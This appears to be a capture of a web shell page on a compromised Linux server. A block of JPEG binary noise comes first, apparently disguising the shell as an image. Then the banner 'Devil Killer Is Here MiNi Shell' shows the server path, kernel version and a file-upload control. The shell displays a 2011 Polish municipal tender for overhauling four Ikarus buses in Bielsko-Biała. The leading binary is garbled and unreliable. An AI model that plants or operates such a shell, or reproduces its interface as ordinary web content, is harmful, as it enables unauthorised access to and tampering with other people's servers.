JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110117/19465-N-2011.html

<p class="kh_header"><b>Bielsko-Biała: Usługa wykonania napraw głównych autobusów dla potrzebMiejskiego Zakładu Komunikacyjnego w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 19465 - 2011; data zamieszczenia: 17.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Komunikacyjny , ul. Długa 50, 43-309 Bielsko-Biała, woj. śląskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzkb-b.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wykonania napraw głównych autobusów dla potrzebMiejskiego Zakładu Komunikacyjnego w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest sukcesywna usługa polegająca na wykonaniu napraw głównych 4 szt. autobusów Ikarus 415.14D dla Miejskiego Zakładu Komunikacyjnego w Bielsku-Białej. 
Zamówienie obejmuje następujące czynności:  
1)	Transport każdego pojazdu podlegającego naprawie głównej z siedziby Zamawiającego do miejsca wykonania naprawy oraz transport powrotny (po wykonaniu naprawy) do siedziby Zamawiającego.
2)	Wykonanie naprawy głównej wg zakresu rzeczowego przedstawianego w SIWZ.
3)	Zdanie pojazdu po naprawie głównej w Stacji Kontroli Pojazdów w siedzibie Zamawiającego na podstawie protokołu zdawczo-odbiorczego.


1.	Zakres rzeczowy naprawy głównej autobusu. 
1.1.	Kompleksowy demontaż autobusu. 
1.2.	Wymiana kratownicy podwozia na nową (przed zabezpieczeniem antykorozyjnym kratownicę należy poddać zabiegowi piaskowania lub śrutowania):
1.2.1.	wymiana na nowe wszystkich osłon, tuneli i wnęk wbudowanych w konstrukcję kratownicy lub nadwozia. 
1.3.	Kompleksowa naprawa szkieletu nadwozia:
1.3.1.	wymiana do dolnej linii okiennej wszystkich elementów szkieletu nadwozia na nowe, 
1.3.2.	wymiana skorodowanych pozostałych elementów nadwozia na nowe oraz poddanie całości szkieletu piaskowaniu lub śrutowaniu oraz pokrycie farbą antykorozyjną.
1.4.	Kompleksowa naprawa dachu.
1.5.	Wymiana poszycia zewnętrznego autobusu obejmująca n/w prace:
1.5.1.	wykonanie poszycia z blach stalowych dwustronnie ocynkowanych (naciąganych cieplnie),
1.5.2.	wymiana klap bocznych i tylnej  na nowe z osprzętem (jak: klamki, zamki, zatrzaski, zawiasy, stabilizatory pneumatyczne  i  uszczelki),
1.5.3.	wymiana drzwi wraz z wymianą kompletu uszczelek na nowe wraz 
z uszczelkami słupków drzwi z zachowaniem oryginalności,
1.5.4.	wymiana wytłoczek ściany przedniej, poszycia wokół szyby wyświetlacza oraz tylnej, poszycia wokół szyby,
1.5.5.	wymiana zderzaka przedniego i tylnego z zachowaniem oryginalnych mocowań zaczepów holowniczych,
1.5.6.	wymiana klapy czołowej,
1.5.7.	wymiana na nowe wszystkich obróbek krawędziowych narożników wykonanych 
z profili otwartych (kątowniki, ceowniki, itp.).
1.6.	Wymiana stopni na nowe - wykonane z blachy nierdzewnej  wraz z obróbką krawędzi stopni kątownikiem aluminiowym. 
1.6.1.	wymiana nadkoli wewnętrznych na nadkola  z blachy nierdzewnej.
1.7.	Wymiana porysowanych szyb okiennych na nowe - wymiana wszystkich uszkodzonych uszczelek okiennych na nowe:
1.7.1.	wymiana szyb okien wyświetlaczy na nowe  (przednia, boczna, tylna), 
1.7.2.	wymiana szyby przedniej wraz z uszczelką na nowe. 
1.8.	Malowanie i zabezpieczenie antykorozyjne profili zamkniętych:
1.8.1.	elementy podwozia i kratownicy należy zabezpieczyć środkiem antykorozyjnym, 
(np. Tectyl 120), 
1.8.2.	profile zamknięte kratownicy należy zabezpieczyć środkiem antykorozyjnym 
(np. Tectyl 210R),
1.9.	Naprawa siedzeń pasażerskich z wymianą tkaniny obiciowej na nową oraz wyprofilowanie pianki; (wzór i rodzaj tkaniny ustalić z Zamawiającym). 
 



1.10.	Wymiana podłogi i poszycia wewnętrznego:
1.10.1.	podłogę wykonać z płyty wielowarstwowej wodoodpornej (o grubości 18 mm), 
1.10.2.	poszycie wewnętrzne (ściany boczne i sufit) musi być zunifikowane z taborem Zamawiającego  - płyta BUK D-391 (o grubości 2,5 mm) WZORNIK - KRONOERG,
1.10.3.	podłogę wyłożyć wykładziną antypoślizgową gładką spawaną typ: Grabiol STOP/JSC Nr 1855-05-228/2-00; grubość warstwy średniej min. 0,8 mm - kolor popielaty, 
1.10.4.	otwory technologiczne dostępu do silnika, skrzyni biegów, itp. wykończyć profilem aluminiowym. 
1.11.	Naprawa kabiny kierowcy.
1.12.	Montaż nowego fotela kierowcy z zawieszeniem pneumatycznym typ: ISRI 6500/517.
1.13.	Montaż nowej żaluzji przeciwsłonecznej (przedniej i bocznej).
1.14.	Kompleksowa naprawa instalacji pneumatycznej:
1.14.1.	wymiana na nowe wszystkich przewodów pneumatycznych wraz z końcówkami (dotyczy to również przewodów z tworzyw sztucznych),
1.14.2.	naprawa osprzętu pneumatycznego z użyciem części oryginalnych, 
1.14.3.	w razie potrzeby wymiana ma nowy zawór hamulcowy, 
1.14.4.	montaż podgrzewaczy zaworów drzwi, 
1.14.5.	wymiana na nowy regulator ciśnienia powietrza (tego samego typu) z wkładem osuszacza powietrza, 
1.14.6.	wymiana cewki oddzielacza oleju na nową, 
1.14.7.	regeneracja sprężarki powietrza (z wymianą tłoków) lub wymiana na nową,
1.14.8.	montaż urządzenia do podgrzewania zaworu 4-ro obwodowego z zastosowaniem zaworu kulowego umieszczonego w komorze urządzenia grzewczego, 
1.14.9.	wymiana na nowe zbiorników powietrza. 
1.15.	Naprawa instalacji elektrycznej oraz osprzętu elektrycznego i elektronicznego w tym:
1.15.1.	Wymiana na nowe wszystkich wiązek oraz przewodów elektrycznych w podwoziu, desce rozdzielczej i suficie, łącznie z wiązką zasilającą automatyczną skrzynię biegów (kabel nr 1),
1.15.2.	wymiana na nowe reflektorów i lamp zewnętrznych oraz wszystkich wyłączników, przekaźników oraz kontrolek z zachowaniem oryginalności,
1.15.3.	naprawa, a w razie potrzeby wymiana wszystkich urządzeń osprzętu elektrycznego, w tym również urządzenia grzewczego,  
1.15.4.	wymiana na nowy silnika przedniej nagrzewnicy oraz silników nagrzewnic wewnętrznych z zachowaniem oryginalności,
1.15.5.	kompleksowa naprawa, a w razie potrzeby wymiana na nowy elektronicznego pedału przyśpieszenia wraz z silnikiem elektrycznym (popychacz pompy wtryskowej) -ETC-2,
1.15.6.	wymiana kompletu dźwigni mechanizmu napędu wycieraczek na nowe,
1.15.7.	wymiana filtra z przewodem nadmuchu alternatora,
1.15.8.	wymiana tablic informacyjnych (przednia, boczna, tylna i wewnętrzna oraz programatora) wraz z przygotowaniem instalacji na tablice elektroniczne diodowe.
- Tablice, programator i kasowniki dostarczy Zamawiający.
- Zainstalowany programator musi sterować jednocześnie tablicami oraz kasownikami.
UWAGA 1. 
Wszystkie przewody elektryczne oraz igielitowe przechodzące przez blachę oraz inne elementy konstrukcyjne muszą być zabezpieczone przelotkami gumowymi lub podobnymi. 

UWAGA 2. 
Urządzenie grzewcze powinno mieć możliwość odcięcia od układu chłodzenia w autobusie 
(2 zawory kulowe na wejściu i wyjściu). 

 




1.16.	Kompleksowa naprawa układu wodnego, w tym:
1.16.1.	naprawa nagrzewnicy przedniej, 
1.16.2.	wymiana chłodnicy wody na nową, 
1.16.3.	wymiana zbiornika wyrównawczego na nowy,
1.16.4.	wymiana grzejników nagrzewnic wewnętrznych na nowe, z zachowaniem oryginalności,
1.16.5.	naprawa obudów nagrzewnic wewnętrznych (w razie potrzeby wymiana na nowe) 
z zachowaniem oryginalności,
1.16.6.	wymiana na nową nagrzewnicę przednią o parametrach równoważnych do obecnie zabudowanej, 
1.16.7.	wymiana zaworków zwrotnych na przewodach układu ogrzewania,
1.16.8.	zalanie układu chłodzenia płynem niskokrzepnącym (płyn na bazie glikolu monoetylenowego) o temperaturze krystalizacji nie wyższej niż  -250C.
1.17.	Kompleksowa naprawa zawieszenia i układu kierowniczego w tym:
1.17.1.	naprawa przekładni kierowniczej (a w razie potrzeby wymiana na nową), 
1.17.2.	wymiana wałka pośredniego z krzyżakami kolumny kierownicy na nowy,
1.17.3.	wymiana na nowy drążka kierowniczego krzywego oraz wymiana na nowe wszystkich końcówek drążków kierowniczych z przystosowaniem ich do centralnego układu smarowania,
1.17.4.	przegląd, a w razie potrzeby naprawa układu centralnego smarowania z wymianą na nowe przewodów i złączek,
1.17.5.	naprawa drążków stabilizacyjnych z wymianą wkładów metalowo-gumowych, 
1.17.6.	wymiana na nowe wszystkich amortyzatorów, 
1.17.7.	wymiana na nowe miechów pneumatycznych wraz z podstawami, 
1.17.8.	naprawa ramienia pośredniego układu kierowniczego, 
1.17.9.	wymiana tylnego zawieszenia na nowe  (belka skrętna). 
1.18.	Silnik:
1.18.1.	usunięcie wycieków płynów technologicznych z bloku silnika oraz osprzętu,
1.18.2.	malowanie silnika w kolorze popielatym, 
1.18.3.	wymiana na nowy tłumik spalin wraz z przewodem łączącym kolektor wydechowy, 
1.18.4.	wymiana na nowe poduszki zawieszenia przewodu łączącego kolektor  wydechowy 
z tłumikiem, wymiana na nowe poduszki zawieszenia silnika 3 szt.,
1.18.5.	wymiana kompletu złączek na nowe na rurach ssących powietrza łączących filtr
z silnikiem,
1.18.6.	naprawa lub wymiana na nowy odwadniacza paliwa, 
1.18.7.	naprawa instalacji paliwowej autobusu:
a)	wymiana przewodów niskiego ciśnienia, 
b)	wymiana zbiornika paliwa na nowy, 
c)	wymiana filtrów paliwa, 
1.18.8.	wymiana na nowy filtra powietrza.
1.19.	Kompleksowy remont osi przedniej, mostu napędowego (z wymianą wszystkich obręczy kół na nowe) i w razie potrzeby wymiana obudowy tylnego mostu napędowego.
1.20.	Regeneracja wału napędowego.
1.21.	Malowanie całego autobusu lakierami akrylowymi w barwach ustalonych z Zamawiającym. 
1.22.	Montaż nowej instalacji elektrycznej pod kasowniki KRG-6 (przewód 4 x 1,5 mm2 ekranizowany). 
 




1.23.	Zainstalowanie w autobusie systemu cyfrowego monitoringu wizyjnego umożliwiającego wykonanie nagrań wideo pochodzących z kamer kolorowych, z możliwością nagrywania dźwięku. Monitoring musi się składać z: 
1.23.1.	pięciu kamer kolorowych, umieszczonych w podsufitowych, kopułowych obudowach, wandaloodpornych, w kolorze czarnym; (3 szt. przedział pasażerski,
1 szt. obserwująca drogę przed pojazdem, 1 szt. obserwująca drogę za pojazdem),
a)	rozdzielczość minimalna kamer: 580 linii,
b)	minimalna czułość kamer: 0,1 luxa,
c)	odporność na wibracje charakterystyczne dla pojazdów komunikacji miejskiej,
d)	brak ostrych krawędzi: miejsce montażu kamer do uzgodnienia 
z Zamawiającym,
1.23.2.	cyfrowego rejestratora wizji nagrywającego w formacie plików, mającego na celu zabezpieczenie zapisanego obrazu przed modyfikacją, tj. graficzny znak wodny, widoczny na zarejestrowanym materiale; nagrywanie w rozdzielczości minimalnej 720 x 288, z prędkością minimalną 25 klatek/sek. dla wszystkich kanałów, wyposażony w twardy dysk 2,5 cala o pojemności min. 500 GB w wyjmowanej kieszeni; zabezpieczenie przed integracją osób trzecich w jego działanie oraz zabezpieczenie przed dostępem zarejestrowanych materiałów, np. poprzez hasła; rejestrator umieszczony w skrzynce zamykanej na klucz; nagrania winny być wykonane w systemie PAL; tryby nagrania: ciągłe, przez kasowanie najstarszych plików, możliwość wyzwalania przez wyjścia alarmowe; przystosowany do  rozwiązań mobilnych (sprawdzony w eksploatacji w pojazdach komunikacji miejskiej); pojemność twardego dysku - przy zachowaniu określonych parametrów nagrania obrazu oraz po uwzględnieniu wybranej przez Wykonawcę metody kompresji obrazu - musi pomieścić min. 200 godzin ciągłego nagrania ze wszystkich kamer oraz zapis dźwięku. Nagrany obraz winien posiadać nakładkę z informacją: nr linii, kierunek jazdy, przystanek, data i godzina, prędkość pojazdu. Wskazane, aby rejestrator pobierał informacje o linii i kierunku z komputera pokładowego systemu informacji pasażerskiej;
1.23.3.	mikrofonu umieszczonego w sposób umożliwiający nagrywanie rozmów kierowcy autobusu z pasażerami;
1.23.4.	terminala z ciekłokrystalicznym wyświetlaczem kolorowym LCD, typu TFT 
o przekątnej   minimalnej 7 cali; powinien posiadać adaptery umożliwiające montaż 
w miejscu wskazanym przez Zamawiającego w kabinie kierowcy z możliwością płynnej regulacji w pionie i poziomie, podgląd obrazu dzielonego; możliwość wyłączenia obrazu podczas jazdy;
1.23.5.	oprogramowania, umożliwiającego przeglądanie i archiwizację danych za pomocą stacji dokującej podłączonej do komputera PC przy pomocy złącza USB; możliwość przekazania zarejestrowanego materiału dowodowego wraz z niezbędnym oprogramowaniem do przeglądania zapisu lub plikiem uruchamiającym odczyt; przekazywanie plików nie może być związane z ograniczeniami licencyjnymi; przeglądanie materiałów według różnych kryteriów: daty, czasu, numeru kamery; możliwość przeglądania obrazu w przedziale czasu; przewijania obrazu do tyłu i do przodu z różnymi prędkościami; zatrzymanie obrazu i jego wydruku oraz zapisanie w formie pliku; możliwość oglądania obrazów z pojedynczej kamery jak i ze wszystkich kamer jednocześnie.
UWAGA 3.  Wykonawca dodatkowo dostarczy do wszystkich remontowanych autobusów 1 szt.  zapasowej kasety z dyskiem twardym o pojemności min. 500 GB. 

 




1.24.	Uzupełnianie, a w razie potrzeby wymiana materiałów eksploatacyjnych (oleje, smary, itp. - rodzaj olejów ustalić z Zamawiającym). 
1.25.	Uzupełnić kompletne oznakowanie pojazdu z uwzględnieniem wyjść awaryjnych,
1.26.	Uzupełnić autobus w młoteczki do zbijania szyb.

UWAGA 4.
W razie braku możliwości naprawy jakiegokolwiek urządzenia lub zespołu autobusu, Wykonawca wymieni go na inny podlegający zadeklarowanemu okresowi gwarancji (nie dotyczy silnika i skrzyni biegów).


1.27.	Montaż automatycznego systemu gaszenia komory silnika, który zawiera:
1.27.1.	układ sterujący: 
a)	przewód detekcyjny pod ciśnieniem ~25 barów ułożony nad silnikiem 
w miejscach najbardziej podatnych na zapalenie się (pompa paliwowa, filtry, przewody paliwowe, kolektor wydechowy, itp.), 
b)	cylinder detekcyjny, 
c)	sygnalizacja dźwiękowa i świetlna na desce rozdzielczej informująca kierowcę o:
.	awarii systemu detekcji, 
.	pożarze w komorze silnika, 
.	awarii gaśnicy (spadek ciśnienia). 
1.27.2.	układ gaśniczy hydro-pneumatyczny:
a)	butla ciśnieniowa wypełniona wodą zawierającą dodatki pianotwórcze (temp. zamarzania - niższa lub równa minus 350C), 
b)	przewód ciśnieniowy ułożony nad silnikiem zawierający min. 8 dysz gaśniczych. 

Miejsca montażu butli oraz dysz gaśniczych ustalić z Zamawiającym. Do każdego zainstalowanego systemu Wykonawca przekaże Zamawiającemu Deklarację zgodności wydaną przez firmę uprawnioną do montażu instalacji oraz certyfikaty na butlę gaśniczą oraz cylinder detekcyjny. 

2.	Wykonawca zobowiązany będzie podpisać z Zamawiającym umowę gwarancyjno-serwisową (Załącznik Nr 5 do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.31.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do złożenia oferty, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 20.000,00 zł (słownie: dwadzieścia tysięcy złotych).
2.	Wadium można wnieść w formie:
2.1.	pieniężnej,
2.2.	poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2.3.	gwarancji bankowej,
2.4.	gwarancji ubezpieczeniowej,
2.5.	w poręczeniu udzielanym przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. z 2007r., Nr 42, poz. 275). 
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego. Konto MZK: Bank Polska Kasa Opieki S.A. w Warszawie, II Oddział 
w Bielsku Białej nr 63 1240 4142 1111 0000 4825 6793, z dopiskiem: Wadium - remont kapitalny autobusów. NIP: ................... Wadium należy wnieść przed terminem składania ofert, tj. nie później niż do 11 lutego 2011r. do godz. 0930. W przypadku wnoszenia wadium 
w formie pieniężnej, za termin jego wniesienia zostanie przyjęty termin uznania rachunku Zamawiającego. Zgodnie z art. 46 ust. 4 Pzp, wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami, wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez Wykonawcę.
4.	Wadium wnoszone w innej formie niż pieniężna należy złożyć w oryginale 
i potwierdzonej za zgodność kserokopii. Oryginału dokumentu wadialnego nie należy trwale złączać z ofertą, ponieważ w dniu otwarcia ofert zostanie on przekazany do Kasy Głównej Zamawiającego.
5.	Na podstawie art. 147 ust. 1 ustawy Pzp, Zamawiający żąda od Wykonawcy, który wygra niniejszy przetarg wniesienia zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykonawca musi wykazać brak podstaw do wykluczenia go z postępowania 
o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1. ustawy Pzp.
Ocena spełnienia tego warunku zostanie dokonana na podstawie następujących dokumentów: 

1.1.	Oświadczenie, stanowiące Załącznik Nr 3 do SIWZ, w którym Wykonawca potwierdzi brak podstaw do wykluczenia go z przedmiotowego postępowania. 
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej. 
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. 

1.2.	Aktualny odpis z właściwego rejestru, w celu wykazania braku podstaw do wykluczenia 
w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. 

1.3.	Pełnomocnictwo do podpisania oferty Wykonawcy. Pełnomocnictwo musi określać zakres pełnomocnictwa i być podpisane przez osobę lub osoby wymienione z nazwiska 
w dokumencie rejestrowym. 
Pełnomocnictwo nie jest wymagane jeśli podpisujący jest lub są właścicielami firmy lub jeśli są wymienieni
z nazwiska w odnośnym dokumencie rejestrowym.

1.4.	Pełnomocnictwo podmiotów występujących wspólnie, np. jako konsorcjum, spółka cywilna 
do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 

1.5.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Zaświadczenie nie może być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej. 
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. 

1.6.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega 
z opłaceniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu. Zaświadczenie nie może być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej. 
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

1.7.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej. 
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

1.8.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
